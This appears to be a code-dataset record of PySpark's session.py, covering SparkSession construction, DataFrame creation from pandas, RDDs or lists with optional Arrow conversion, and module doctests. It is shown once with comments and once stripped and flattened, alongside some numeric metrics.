                # Only localize the columns the schema marks as timestamps.
                for field in schema:
                    # TODO: handle nested timestamps, such as ArrayType(TimestampType())?
                    if isinstance(field.dataType, TimestampType):
                        s = _check_series_convert_timestamps_tz_local(pdf[field.name], timezone)
                        if s is not pdf[field.name]:
                            if not copied:
                                # Copy once if the series is modified to prevent the original
                                # Pandas DataFrame from being updated
                                pdf = pdf.copy()
                                copied = True
                            pdf[field.name] = s
            else:
                # No schema: probe every column for timestamp conversion.
                for column, series in pdf.iteritems():
                    s = _check_series_convert_timestamps_tz_local(series, timezone)
                    if s is not series:
                        if not copied:
                            # Copy once if the series is modified to prevent the original
                            # Pandas DataFrame from being updated
                            pdf = pdf.copy()
                            copied = True
                        pdf[column] = s

        # Convert pandas.DataFrame to list of numpy records
        np_records = pdf.to_records(index=False)

        # Check if any columns need to be fixed for Spark to infer properly
        if len(np_records) > 0:
            record_dtype = self._get_numpy_record_dtype(np_records[0])
            if record_dtype is not None:
                return [r.astype(record_dtype).tolist() for r in np_records]

        # Convert list of numpy records to python lists
        return [r.tolist() for r in np_records]
def _create_from_pandas_with_arrow(self, pdf, schema, timezone):
    """
    Create a DataFrame from a given pandas.DataFrame by slicing it into partitions, converting
    to Arrow data, then sending to the JVM to parallelize. If a schema is passed in, the
    data types will be used to coerce the data in Pandas to Arrow conversion.

    :param pdf: the input :class:`pandas.DataFrame`
    :param schema: a :class:`StructType`, a list/tuple of column names, or another
        value when no usable schema was supplied by the caller
    :param timezone: session-local timezone handed to the Arrow serializer
    """
    from pyspark.serializers import ArrowStreamPandasSerializer
    from pyspark.sql.types import from_arrow_type, to_arrow_type, TimestampType
    from pyspark.sql.utils import require_minimum_pandas_version, \
        require_minimum_pyarrow_version

    # Fail fast with a clear message if pandas/pyarrow are too old.
    require_minimum_pandas_version()
    require_minimum_pyarrow_version()

    from pandas.api.types import is_datetime64_dtype, is_datetime64tz_dtype
    import pyarrow as pa

    # Create the Spark schema from list of names passed in with Arrow types
    if isinstance(schema, (list, tuple)):
        # Let Arrow infer the field types from the DataFrame, then pair them
        # with the caller-supplied column names.
        arrow_schema = pa.Schema.from_pandas(pdf, preserve_index=False)
        struct = StructType()
        for name, field in zip(schema, arrow_schema):
            struct.add(name, from_arrow_type(field.type), nullable=field.nullable)
        schema = struct

    # Determine arrow types to coerce data when creating batches
    if isinstance(schema, StructType):
        arrow_types = [to_arrow_type(f.dataType) for f in schema.fields]
    elif isinstance(schema, DataType):
        raise ValueError("Single data type %s is not supported with Arrow" % str(schema))
    else:
        # Any timestamps must be coerced to be compatible with Spark
        arrow_types = [to_arrow_type(TimestampType())
                       if is_datetime64_dtype(t) or is_datetime64tz_dtype(t) else None
                       for t in pdf.dtypes]

    # Slice the DataFrame to be batched
    step = -(-len(pdf) // self.sparkContext.defaultParallelism)  # round int up
    pdf_slices = (pdf[start:start + step] for start in xrange(0, len(pdf), step))

    # Create list of Arrow (columns, type) for serializer dump_stream
    arrow_data = [[(c, t) for (_, c), t in zip(pdf_slice.iteritems(), arrow_types)]
                  for pdf_slice in pdf_slices]

    jsqlContext = self._wrapped._jsqlContext

    safecheck = self._wrapped._conf.arrowSafeTypeConversion()
    col_by_name = True  # col by name only applies to StructType columns, can't happen here
    ser = ArrowStreamPandasSerializer(timezone, safecheck, col_by_name)

    def reader_func(temp_filename):
        # Reads the Arrow stream file written by _serialize_to_jvm back on the JVM side.
        return self._jvm.PythonSQLUtils.readArrowStreamFromFile(jsqlContext, temp_filename)

    def create_RDD_server():
        # Alternative transport: a socket server the JVM pulls batches from.
        return self._jvm.ArrowRDDServer(jsqlContext)

    # Create Spark DataFrame from Arrow stream file, using one batch per partition
    jrdd = self._sc._serialize_to_jvm(arrow_data, ser, reader_func, create_RDD_server)
    jdf = self._jvm.PythonSQLUtils.toDataFrame(jrdd, schema.json(), jsqlContext)
    df = DataFrame(jdf, self._wrapped)
    # Cache the known schema so df.schema does not round-trip through the JVM.
    df._schema = schema
    return df
@staticmethod
def _create_shell_session():
    """
    Build the SparkSession used by the pyspark shell.

    Called from shell.py so that all of the Hive-detection error handling lives
    here instead of in the shell startup script, where any local variables would
    leak into the user's namespace.
    """
    import py4j
    from pyspark.conf import SparkConf
    from pyspark.context import SparkContext
    try:
        conf = SparkConf()
        if conf.get('spark.sql.catalogImplementation', 'hive').lower() == 'hive':
            # Touching HiveConf raises when Spark was built without Hive classes.
            SparkContext._jvm.org.apache.hadoop.hive.conf.HiveConf()
            return SparkSession.builder \
                .enableHiveSupport() \
                .getOrCreate()
        return SparkSession.builder.getOrCreate()
    except (py4j.protocol.Py4JError, TypeError):
        # Hive was requested but is unavailable: warn, then degrade gracefully.
        if conf.get('spark.sql.catalogImplementation', '').lower() == 'hive':
            warnings.warn("Fall back to non-hive support because failing to access HiveConf, "
                          "please make sure you build spark with hive")
        return SparkSession.builder.getOrCreate()
@since(2.0)
@ignore_unicode_prefix
def createDataFrame(self, data, schema=None, samplingRatio=None, verifySchema=True):
    """
    Creates a :class:`DataFrame` from an :class:`RDD`, a list or a :class:`pandas.DataFrame`.

    When ``schema`` is a list of column names, the type of each column
    will be inferred from ``data``.

    When ``schema`` is ``None``, it will try to infer the schema (column names and types)
    from ``data``, which should be an RDD of either :class:`Row`,
    :class:`namedtuple`, or :class:`dict`.

    When ``schema`` is :class:`pyspark.sql.types.DataType` or a datatype string, it must match
    the real data, or an exception will be thrown at runtime. If the given schema is not
    :class:`pyspark.sql.types.StructType`, it will be wrapped into a
    :class:`pyspark.sql.types.StructType` as its only field, and the field name will be "value".
    Each record will also be wrapped into a tuple, which can be converted to row later.

    If schema inference is needed, ``samplingRatio`` is used to determined the ratio of
    rows used for schema inference. The first row will be used if ``samplingRatio`` is ``None``.

    :param data: an RDD of any kind of SQL data representation (e.g. row, tuple, int, boolean,
        etc.), :class:`list`, or :class:`pandas.DataFrame`.
    :param schema: a :class:`pyspark.sql.types.DataType` or a datatype string or a list of
        column names, default is ``None``. The data type string format equals to
        :class:`pyspark.sql.types.DataType.simpleString`, except that top level struct type can
        omit the ``struct<>`` and atomic types use ``typeName()`` as their format, e.g. use
        ``byte`` instead of ``tinyint`` for :class:`pyspark.sql.types.ByteType`. We can also use
        ``int`` as a short name for ``IntegerType``.
    :param samplingRatio: the sample ratio of rows used for inferring
    :param verifySchema: verify data types of every row against schema.
    :return: :class:`DataFrame`

    .. versionchanged:: 2.1
       Added verifySchema.

    .. note:: Usage with spark.sql.execution.arrow.pyspark.enabled=True is experimental.

    .. note:: When Arrow optimization is enabled, strings inside Pandas DataFrame in Python
        2 are converted into bytes as they are bytes in Python 2 whereas regular strings are
        left as strings. When using strings in Python 2, use unicode `u""` as Python standard
        practice.

    >>> l = [('Alice', 1)]
    >>> spark.createDataFrame(l).collect()
    [Row(_1=u'Alice', _2=1)]
    >>> spark.createDataFrame(l, ['name', 'age']).collect()
    [Row(name=u'Alice', age=1)]

    >>> d = [{'name': 'Alice', 'age': 1}]
    >>> spark.createDataFrame(d).collect()
    [Row(age=1, name=u'Alice')]

    >>> rdd = sc.parallelize(l)
    >>> spark.createDataFrame(rdd).collect()
    [Row(_1=u'Alice', _2=1)]
    >>> df = spark.createDataFrame(rdd, ['name', 'age'])
    >>> df.collect()
    [Row(name=u'Alice', age=1)]

    >>> from pyspark.sql import Row
    >>> Person = Row('name', 'age')
    >>> person = rdd.map(lambda r: Person(*r))
    >>> df2 = spark.createDataFrame(person)
    >>> df2.collect()
    [Row(name=u'Alice', age=1)]

    >>> from pyspark.sql.types import *
    >>> schema = StructType([
    ...    StructField("name", StringType(), True),
    ...    StructField("age", IntegerType(), True)])
    >>> df3 = spark.createDataFrame(rdd, schema)
    >>> df3.collect()
    [Row(name=u'Alice', age=1)]

    >>> spark.createDataFrame(df.toPandas()).collect()  # doctest: +SKIP
    [Row(name=u'Alice', age=1)]
    >>> spark.createDataFrame(pandas.DataFrame([[1, 2]])).collect()  # doctest: +SKIP
    [Row(0=1, 1=2)]

    >>> spark.createDataFrame(rdd, "a: string, b: int").collect()
    [Row(a=u'Alice', b=1)]
    >>> rdd = rdd.map(lambda row: row[1])
    >>> spark.createDataFrame(rdd, "int").collect()
    [Row(value=1)]
    >>> spark.createDataFrame(rdd, "boolean").collect() # doctest: +IGNORE_EXCEPTION_DETAIL
    Traceback (most recent call last):
        ...
    Py4JJavaError: ...
    """
    # Record this session as the active one on both the Python and JVM sides.
    SparkSession._activeSession = self
    self._jvm.SparkSession.setActiveSession(self._jsparkSession)
    if isinstance(data, DataFrame):
        raise TypeError("data is already a DataFrame")

    # Normalize the schema argument: DDL string -> DataType, names -> bytes (Py2).
    if isinstance(schema, basestring):
        schema = _parse_datatype_string(schema)
    elif isinstance(schema, (list, tuple)):
        # Must re-encode any unicode strings to be consistent with StructField names
        schema = [x.encode('utf-8') if not isinstance(x, str) else x for x in schema]

    # pandas is an optional dependency; only detect it, never require it here.
    try:
        import pandas
        has_pandas = True
    except Exception:
        has_pandas = False
    if has_pandas and isinstance(data, pandas.DataFrame):
        from pyspark.sql.utils import require_minimum_pandas_version
        require_minimum_pandas_version()

        if self._wrapped._conf.pandasRespectSessionTimeZone():
            timezone = self._wrapped._conf.sessionLocalTimeZone()
        else:
            timezone = None

        # If no schema supplied by user then get the names of columns only
        if schema is None:
            schema = [str(x) if not isinstance(x, basestring) else
                      (x.encode('utf-8') if not isinstance(x, str) else x)
                      for x in data.columns]

        # Prefer the Arrow fast path; fall back to row-by-row conversion on
        # failure when the fallback conf allows it, otherwise re-raise.
        if self._wrapped._conf.arrowPySparkEnabled() and len(data) > 0:
            try:
                return self._create_from_pandas_with_arrow(data, schema, timezone)
            except Exception as e:
                from pyspark.util import _exception_message
                if self._wrapped._conf.arrowPySparkFallbackEnabled():
                    msg = (
                        "createDataFrame attempted Arrow optimization because "
                        "'spark.sql.execution.arrow.pyspark.enabled' is set to true; however, "
                        "failed by the reason below:\n  %s\n"
                        "Attempting non-optimization as "
                        "'spark.sql.execution.arrow.pyspark.fallback.enabled' is set to "
                        "true." % _exception_message(e))
                    warnings.warn(msg)
                else:
                    msg = (
                        "createDataFrame attempted Arrow optimization because "
                        "'spark.sql.execution.arrow.pyspark.enabled' is set to true, but has "
                        "reached the error below and will not continue because automatic "
                        "fallback with 'spark.sql.execution.arrow.pyspark.fallback.enabled' "
                        "has been set to false.\n  %s" % _exception_message(e))
                    warnings.warn(msg)
                    raise
        # Non-Arrow path: turn the pandas DataFrame into a list of records.
        data = self._convert_from_pandas(data, schema, timezone)

    # Build a per-row `prepare` callable: it verifies each record against the
    # schema (when verifySchema is on) and, for a single non-struct DataType,
    # wraps the value into a 1-tuple so it becomes a one-column row.
    if isinstance(schema, StructType):
        verify_func = _make_type_verifier(schema) if verifySchema else lambda _: True

        def prepare(obj):
            verify_func(obj)
            return obj
    elif isinstance(schema, DataType):
        dataType = schema
        schema = StructType().add("value", schema)

        verify_func = _make_type_verifier(
            dataType, name="field value") if verifySchema else lambda _: True

        def prepare(obj):
            verify_func(obj)
            return obj,
    else:
        prepare = lambda obj: obj

    if isinstance(data, RDD):
        rdd, schema = self._createFromRDD(data.map(prepare), schema, samplingRatio)
    else:
        rdd, schema = self._createFromLocal(map(prepare, data), schema)
    jrdd = self._jvm.SerDeUtil.toJavaArray(rdd._to_java_object_rdd())
    jdf = self._jsparkSession.applySchemaToPythonRDD(jrdd.rdd(), schema.json())
    df = DataFrame(jdf, self._wrapped)
    # Cache the known schema so df.schema does not round-trip through the JVM.
    df._schema = schema
    return df
@ignore_unicode_prefix
@since(2.0)
def sql(self, sqlQuery):
    """Run the given SQL query and return its result as a :class:`DataFrame`.

    :return: :class:`DataFrame`

    >>> df.createOrReplaceTempView("table1")
    >>> df2 = spark.sql("SELECT field1 AS f1, field2 as f2 from table1")
    >>> df2.collect()
    [Row(f1=1, f2=u'row1'), Row(f1=2, f2=u'row2'), Row(f1=3, f2=u'row3')]
    """
    jdf = self._jsparkSession.sql(sqlQuery)
    return DataFrame(jdf, self._wrapped)
@since(2.0)
def table(self, tableName):
    """Look up ``tableName`` and return it as a :class:`DataFrame`.

    :return: :class:`DataFrame`

    >>> df.createOrReplaceTempView("table1")
    >>> df2 = spark.table("table1")
    >>> sorted(df.collect()) == sorted(df2.collect())
    True
    """
    jdf = self._jsparkSession.table(tableName)
    return DataFrame(jdf, self._wrapped)
@property
@since(2.0)
def read(self):
    """
    Returns a :class:`DataFrameReader` that can be used to read data
    in as a :class:`DataFrame`.

    :return: :class:`DataFrameReader`
    """
    # A new reader is constructed on each access, bound to this session's SQLContext.
    return DataFrameReader(self._wrapped)
@property
@since(2.0)
def readStream(self):
    """
    Returns a :class:`DataStreamReader` that can be used to read data streams
    as a streaming :class:`DataFrame`.

    .. note:: Evolving.

    :return: :class:`DataStreamReader`
    """
    # A new reader is constructed on each access, bound to this session's SQLContext.
    return DataStreamReader(self._wrapped)
@property
@since(2.0)
def streams(self):
    """A :class:`StreamingQueryManager` for managing all the
    :class:`StreamingQuery` instances active on `this` context.

    .. note:: Evolving.

    :return: :class:`StreamingQueryManager`
    """
    # Imported lazily to avoid a circular dependency at module import time.
    from pyspark.sql.streaming import StreamingQueryManager
    manager = StreamingQueryManager(self._jsparkSession.streams())
    return manager
@since(2.0)
def stop(self):
    """Stop the underlying :class:`SparkContext`.

    Also clears the JVM-side default/active sessions and the Python-side
    singletons so that a later ``Builder.getOrCreate`` builds a fresh session.
    """
    self._sc.stop()
    # We should clean the default session up. See SPARK-23228.
    self._jvm.SparkSession.clearDefaultSession()
    self._jvm.SparkSession.clearActiveSession()
    # Reset the Python-side cached singletons so stale sessions are not reused.
    SparkSession._instantiatedSession = None
    SparkSession._activeSession = None
@since(2.0)
def __enter__(self):
    """
    Enable 'with SparkSession.builder.(...).getOrCreate() as session: app' syntax.

    Returns the session itself; no additional setup is performed on entry.
    """
    return self
@since(2.0)
def __exit__(self, exc_type, exc_val, exc_tb):
    """
    Enable 'with SparkSession.builder.(...).getOrCreate() as session: app' syntax.

    Specifically stop the SparkSession on exit of the with block.
    """
    # Returning None means exceptions raised inside the with block are
    # propagated after the session has been stopped.
    self.stop()
def _test():
    """Run this module's doctests against a local 4-core SparkContext."""
    import os
    import doctest
    from pyspark.context import SparkContext
    from pyspark.sql import Row
    import pyspark.sql.session

    os.chdir(os.environ["SPARK_HOME"])

    # Populate the doctest globals with a context, a session and sample data.
    globs = pyspark.sql.session.__dict__.copy()
    sc = SparkContext('local[4]', 'PythonTest')
    rows = [Row(field1=1, field2="row1"),
            Row(field1=2, field2="row2"),
            Row(field1=3, field2="row3")]
    rdd = sc.parallelize(rows)
    globs['sc'] = sc
    globs['spark'] = SparkSession(sc)
    globs['rdd'] = rdd
    globs['df'] = rdd.toDF()

    failure_count, _ = doctest.testmod(
        pyspark.sql.session, globs=globs,
        optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE)
    globs['sc'].stop()
    if failure_count:
        sys.exit(-1)
if __name__ == "__main__":
    # Run the module doctests when this file is executed directly.
    _test()
| 41.404162 | 100 | 0.598513 |
from __future__ import print_function
import sys
import warnings
from functools import reduce
from threading import RLock
if sys.version >= '3':
basestring = unicode = str
xrange = range
else:
from itertools import izip as zip, imap as map
from pyspark import since
from pyspark.rdd import RDD, ignore_unicode_prefix
from pyspark.sql.conf import RuntimeConfig
from pyspark.sql.dataframe import DataFrame
from pyspark.sql.readwriter import DataFrameReader
from pyspark.sql.streaming import DataStreamReader
from pyspark.sql.types import Row, DataType, StringType, StructType, TimestampType, \
_make_type_verifier, _infer_schema, _has_nulltype, _merge_type, _create_converter, \
_parse_datatype_string
from pyspark.sql.utils import install_exception_handler
__all__ = ["SparkSession"]
def _monkey_patch_RDD(sparkSession):
def toDF(self, schema=None, sampleRatio=None):
return sparkSession.createDataFrame(self, schema, sampleRatio)
RDD.toDF = toDF
class SparkSession(object):
class Builder(object):
_lock = RLock()
_options = {}
_sc = None
@since(2.0)
def config(self, key=None, value=None, conf=None):
with self._lock:
if conf is None:
self._options[key] = str(value)
else:
for (k, v) in conf.getAll():
self._options[k] = v
return self
@since(2.0)
def master(self, master):
return self.config("spark.master", master)
@since(2.0)
def appName(self, name):
return self.config("spark.app.name", name)
@since(2.0)
def enableHiveSupport(self):
return self.config("spark.sql.catalogImplementation", "hive")
def _sparkContext(self, sc):
with self._lock:
self._sc = sc
return self
@since(2.0)
def getOrCreate(self):
with self._lock:
from pyspark.context import SparkContext
from pyspark.conf import SparkConf
session = SparkSession._instantiatedSession
if session is None or session._sc._jsc is None:
if self._sc is not None:
sc = self._sc
else:
sparkConf = SparkConf()
for key, value in self._options.items():
sparkConf.set(key, value)
sc = SparkContext.getOrCreate(sparkConf)
# by all sessions.
session = SparkSession(sc)
for key, value in self._options.items():
session._jsparkSession.sessionState().conf().setConfString(key, value)
return session
builder = Builder()
_instantiatedSession = None
_activeSession = None
@ignore_unicode_prefix
def __init__(self, sparkContext, jsparkSession=None):
from pyspark.sql.context import SQLContext
self._sc = sparkContext
self._jsc = self._sc._jsc
self._jvm = self._sc._jvm
if jsparkSession is None:
if self._jvm.SparkSession.getDefaultSession().isDefined() \
and not self._jvm.SparkSession.getDefaultSession().get() \
.sparkContext().isStopped():
jsparkSession = self._jvm.SparkSession.getDefaultSession().get()
else:
jsparkSession = self._jvm.SparkSession(self._jsc.sc())
self._jsparkSession = jsparkSession
self._jwrapped = self._jsparkSession.sqlContext()
self._wrapped = SQLContext(self._sc, self, self._jwrapped)
_monkey_patch_RDD(self)
install_exception_handler()
# If we had an instantiated SparkSession attached with a SparkContext
# which is stopped now, we need to renew the instantiated SparkSession.
# Otherwise, we will use invalid SparkSession when we call Builder.getOrCreate.
if SparkSession._instantiatedSession is None \
or SparkSession._instantiatedSession._sc._jsc is None:
SparkSession._instantiatedSession = self
SparkSession._activeSession = self
self._jvm.SparkSession.setDefaultSession(self._jsparkSession)
self._jvm.SparkSession.setActiveSession(self._jsparkSession)
def _repr_html_(self):
return """
<div>
<p><b>SparkSession - {catalogImplementation}</b></p>
{sc_HTML}
</div>
""".format(
catalogImplementation=self.conf.get("spark.sql.catalogImplementation"),
sc_HTML=self.sparkContext._repr_html_()
)
@since(2.0)
def newSession(self):
return self.__class__(self._sc, self._jsparkSession.newSession())
@classmethod
@since(3.0)
def getActiveSession(cls):
from pyspark import SparkContext
sc = SparkContext._active_spark_context
if sc is None:
return None
else:
if sc._jvm.SparkSession.getActiveSession().isDefined():
SparkSession(sc, sc._jvm.SparkSession.getActiveSession().get())
return SparkSession._activeSession
else:
return None
@property
@since(2.0)
def sparkContext(self):
return self._sc
@property
@since(2.0)
def version(self):
return self._jsparkSession.version()
@property
@since(2.0)
def conf(self):
if not hasattr(self, "_conf"):
self._conf = RuntimeConfig(self._jsparkSession.conf())
return self._conf
@property
@since(2.0)
def catalog(self):
from pyspark.sql.catalog import Catalog
if not hasattr(self, "_catalog"):
self._catalog = Catalog(self)
return self._catalog
@property
@since(2.0)
def udf(self):
from pyspark.sql.udf import UDFRegistration
return UDFRegistration(self)
@since(2.0)
def range(self, start, end=None, step=1, numPartitions=None):
if numPartitions is None:
numPartitions = self._sc.defaultParallelism
if end is None:
jdf = self._jsparkSession.range(0, int(start), int(step), int(numPartitions))
else:
jdf = self._jsparkSession.range(int(start), int(end), int(step), int(numPartitions))
return DataFrame(jdf, self._wrapped)
def _inferSchemaFromList(self, data, names=None):
if not data:
raise ValueError("can not infer schema from empty dataset")
first = data[0]
if type(first) is dict:
warnings.warn("inferring schema from dict is deprecated,"
"please use pyspark.sql.Row instead")
schema = reduce(_merge_type, (_infer_schema(row, names) for row in data))
if _has_nulltype(schema):
raise ValueError("Some of types cannot be determined after inferring")
return schema
def _inferSchema(self, rdd, samplingRatio=None, names=None):
first = rdd.first()
if not first:
raise ValueError("The first row in RDD is empty, "
"can not infer schema")
if type(first) is dict:
warnings.warn("Using RDD of dict to inferSchema is deprecated. "
"Use pyspark.sql.Row instead")
if samplingRatio is None:
schema = _infer_schema(first, names=names)
if _has_nulltype(schema):
for row in rdd.take(100)[1:]:
schema = _merge_type(schema, _infer_schema(row, names=names))
if not _has_nulltype(schema):
break
else:
raise ValueError("Some of types cannot be determined by the "
"first 100 rows, please try again with sampling")
else:
if samplingRatio < 0.99:
rdd = rdd.sample(False, float(samplingRatio))
schema = rdd.map(lambda row: _infer_schema(row, names)).reduce(_merge_type)
return schema
def _createFromRDD(self, rdd, schema, samplingRatio):
if schema is None or isinstance(schema, (list, tuple)):
struct = self._inferSchema(rdd, samplingRatio, names=schema)
converter = _create_converter(struct)
rdd = rdd.map(converter)
if isinstance(schema, (list, tuple)):
for i, name in enumerate(schema):
struct.fields[i].name = name
struct.names[i] = name
schema = struct
elif not isinstance(schema, StructType):
raise TypeError("schema should be StructType or list or None, but got: %s" % schema)
# convert python objects to sql data
rdd = rdd.map(schema.toInternal)
return rdd, schema
def _createFromLocal(self, data, schema):
# make sure data could consumed multiple times
if not isinstance(data, list):
data = list(data)
if schema is None or isinstance(schema, (list, tuple)):
struct = self._inferSchemaFromList(data, names=schema)
converter = _create_converter(struct)
data = map(converter, data)
if isinstance(schema, (list, tuple)):
for i, name in enumerate(schema):
struct.fields[i].name = name
struct.names[i] = name
schema = struct
elif not isinstance(schema, StructType):
raise TypeError("schema should be StructType or list or None, but got: %s" % schema)
# convert python objects to sql data
data = [schema.toInternal(row) for row in data]
return self._sc.parallelize(data), schema
def _get_numpy_record_dtype(self, rec):
import numpy as np
cur_dtypes = rec.dtype
col_names = cur_dtypes.names
record_type_list = []
has_rec_fix = False
for i in xrange(len(cur_dtypes)):
curr_type = cur_dtypes[i]
# If type is a datetime64 timestamp, convert to microseconds
# NOTE: if dtype is datetime[ns] then np.record.tolist() will output values as longs,
# conversion from [us] or lower will lead to py datetime objects, see SPARK-22417
if curr_type == np.dtype('datetime64[ns]'):
curr_type = 'datetime64[us]'
has_rec_fix = True
record_type_list.append((str(col_names[i]), curr_type))
return np.dtype(record_type_list) if has_rec_fix else None
def _convert_from_pandas(self, pdf, schema, timezone):
if timezone is not None:
from pyspark.sql.types import _check_series_convert_timestamps_tz_local
copied = False
if isinstance(schema, StructType):
for field in schema:
# TODO: handle nested timestamps, such as ArrayType(TimestampType())?
if isinstance(field.dataType, TimestampType):
s = _check_series_convert_timestamps_tz_local(pdf[field.name], timezone)
if s is not pdf[field.name]:
if not copied:
# Copy once if the series is modified to prevent the original
# Pandas DataFrame from being updated
pdf = pdf.copy()
copied = True
pdf[field.name] = s
else:
for column, series in pdf.iteritems():
s = _check_series_convert_timestamps_tz_local(series, timezone)
if s is not series:
if not copied:
# Copy once if the series is modified to prevent the original
# Pandas DataFrame from being updated
pdf = pdf.copy()
copied = True
pdf[column] = s
# Convert pandas.DataFrame to list of numpy records
np_records = pdf.to_records(index=False)
# Check if any columns need to be fixed for Spark to infer properly
if len(np_records) > 0:
record_dtype = self._get_numpy_record_dtype(np_records[0])
if record_dtype is not None:
return [r.astype(record_dtype).tolist() for r in np_records]
# Convert list of numpy records to python lists
return [r.tolist() for r in np_records]
def _create_from_pandas_with_arrow(self, pdf, schema, timezone):
from pyspark.serializers import ArrowStreamPandasSerializer
from pyspark.sql.types import from_arrow_type, to_arrow_type, TimestampType
from pyspark.sql.utils import require_minimum_pandas_version, \
require_minimum_pyarrow_version
require_minimum_pandas_version()
require_minimum_pyarrow_version()
from pandas.api.types import is_datetime64_dtype, is_datetime64tz_dtype
import pyarrow as pa
# Create the Spark schema from list of names passed in with Arrow types
if isinstance(schema, (list, tuple)):
arrow_schema = pa.Schema.from_pandas(pdf, preserve_index=False)
struct = StructType()
for name, field in zip(schema, arrow_schema):
struct.add(name, from_arrow_type(field.type), nullable=field.nullable)
schema = struct
# Determine arrow types to coerce data when creating batches
if isinstance(schema, StructType):
arrow_types = [to_arrow_type(f.dataType) for f in schema.fields]
elif isinstance(schema, DataType):
raise ValueError("Single data type %s is not supported with Arrow" % str(schema))
else:
# Any timestamps must be coerced to be compatible with Spark
arrow_types = [to_arrow_type(TimestampType())
if is_datetime64_dtype(t) or is_datetime64tz_dtype(t) else None
for t in pdf.dtypes]
# Slice the DataFrame to be batched
step = -(-len(pdf) // self.sparkContext.defaultParallelism) # round int up
pdf_slices = (pdf[start:start + step] for start in xrange(0, len(pdf), step))
# Create list of Arrow (columns, type) for serializer dump_stream
arrow_data = [[(c, t) for (_, c), t in zip(pdf_slice.iteritems(), arrow_types)]
for pdf_slice in pdf_slices]
jsqlContext = self._wrapped._jsqlContext
safecheck = self._wrapped._conf.arrowSafeTypeConversion()
col_by_name = True # col by name only applies to StructType columns, can't happen here
ser = ArrowStreamPandasSerializer(timezone, safecheck, col_by_name)
def reader_func(temp_filename):
return self._jvm.PythonSQLUtils.readArrowStreamFromFile(jsqlContext, temp_filename)
def create_RDD_server():
return self._jvm.ArrowRDDServer(jsqlContext)
jrdd = self._sc._serialize_to_jvm(arrow_data, ser, reader_func, create_RDD_server)
jdf = self._jvm.PythonSQLUtils.toDataFrame(jrdd, schema.json(), jsqlContext)
df = DataFrame(jdf, self._wrapped)
df._schema = schema
return df
@staticmethod
def _create_shell_session():
import py4j
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
try:
conf = SparkConf()
if conf.get('spark.sql.catalogImplementation', 'hive').lower() == 'hive':
SparkContext._jvm.org.apache.hadoop.hive.conf.HiveConf()
return SparkSession.builder\
.enableHiveSupport()\
.getOrCreate()
else:
return SparkSession.builder.getOrCreate()
except (py4j.protocol.Py4JError, TypeError):
if conf.get('spark.sql.catalogImplementation', '').lower() == 'hive':
warnings.warn("Fall back to non-hive support because failing to access HiveConf, "
"please make sure you build spark with hive")
return SparkSession.builder.getOrCreate()
@since(2.0)
@ignore_unicode_prefix
def createDataFrame(self, data, schema=None, samplingRatio=None, verifySchema=True):
SparkSession._activeSession = self
self._jvm.SparkSession.setActiveSession(self._jsparkSession)
if isinstance(data, DataFrame):
raise TypeError("data is already a DataFrame")
if isinstance(schema, basestring):
schema = _parse_datatype_string(schema)
elif isinstance(schema, (list, tuple)):
schema = [x.encode('utf-8') if not isinstance(x, str) else x for x in schema]
try:
import pandas
has_pandas = True
except Exception:
has_pandas = False
if has_pandas and isinstance(data, pandas.DataFrame):
from pyspark.sql.utils import require_minimum_pandas_version
require_minimum_pandas_version()
if self._wrapped._conf.pandasRespectSessionTimeZone():
timezone = self._wrapped._conf.sessionLocalTimeZone()
else:
timezone = None
if schema is None:
schema = [str(x) if not isinstance(x, basestring) else
(x.encode('utf-8') if not isinstance(x, str) else x)
for x in data.columns]
if self._wrapped._conf.arrowPySparkEnabled() and len(data) > 0:
try:
return self._create_from_pandas_with_arrow(data, schema, timezone)
except Exception as e:
from pyspark.util import _exception_message
if self._wrapped._conf.arrowPySparkFallbackEnabled():
msg = (
"createDataFrame attempted Arrow optimization because "
"'spark.sql.execution.arrow.pyspark.enabled' is set to true; however, "
"failed by the reason below:\n %s\n"
"Attempting non-optimization as "
"'spark.sql.execution.arrow.pyspark.fallback.enabled' is set to "
"true." % _exception_message(e))
warnings.warn(msg)
else:
msg = (
"createDataFrame attempted Arrow optimization because "
"'spark.sql.execution.arrow.pyspark.enabled' is set to true, but has "
"reached the error below and will not continue because automatic "
"fallback with 'spark.sql.execution.arrow.pyspark.fallback.enabled' "
"has been set to false.\n %s" % _exception_message(e))
warnings.warn(msg)
raise
data = self._convert_from_pandas(data, schema, timezone)
if isinstance(schema, StructType):
verify_func = _make_type_verifier(schema) if verifySchema else lambda _: True
def prepare(obj):
verify_func(obj)
return obj
elif isinstance(schema, DataType):
dataType = schema
schema = StructType().add("value", schema)
verify_func = _make_type_verifier(
dataType, name="field value") if verifySchema else lambda _: True
def prepare(obj):
verify_func(obj)
return obj,
else:
prepare = lambda obj: obj
if isinstance(data, RDD):
rdd, schema = self._createFromRDD(data.map(prepare), schema, samplingRatio)
else:
rdd, schema = self._createFromLocal(map(prepare, data), schema)
jrdd = self._jvm.SerDeUtil.toJavaArray(rdd._to_java_object_rdd())
jdf = self._jsparkSession.applySchemaToPythonRDD(jrdd.rdd(), schema.json())
df = DataFrame(jdf, self._wrapped)
df._schema = schema
return df
@ignore_unicode_prefix
@since(2.0)
def sql(self, sqlQuery):
return DataFrame(self._jsparkSession.sql(sqlQuery), self._wrapped)
@since(2.0)
def table(self, tableName):
return DataFrame(self._jsparkSession.table(tableName), self._wrapped)
@property
@since(2.0)
def read(self):
return DataFrameReader(self._wrapped)
@property
@since(2.0)
def readStream(self):
return DataStreamReader(self._wrapped)
@property
@since(2.0)
def streams(self):
from pyspark.sql.streaming import StreamingQueryManager
return StreamingQueryManager(self._jsparkSession.streams())
@since(2.0)
def stop(self):
self._sc.stop()
self._jvm.SparkSession.clearDefaultSession()
self._jvm.SparkSession.clearActiveSession()
SparkSession._instantiatedSession = None
SparkSession._activeSession = None
@since(2.0)
def __enter__(self):
return self
@since(2.0)
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
def _test():
import os
import doctest
from pyspark.context import SparkContext
from pyspark.sql import Row
import pyspark.sql.session
os.chdir(os.environ["SPARK_HOME"])
globs = pyspark.sql.session.__dict__.copy()
sc = SparkContext('local[4]', 'PythonTest')
globs['sc'] = sc
globs['spark'] = SparkSession(sc)
globs['rdd'] = rdd = sc.parallelize(
[Row(field1=1, field2="row1"),
Row(field1=2, field2="row2"),
Row(field1=3, field2="row3")])
globs['df'] = rdd.toDF()
(failure_count, test_count) = doctest.testmod(
pyspark.sql.session, globs=globs,
optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
| true | true |
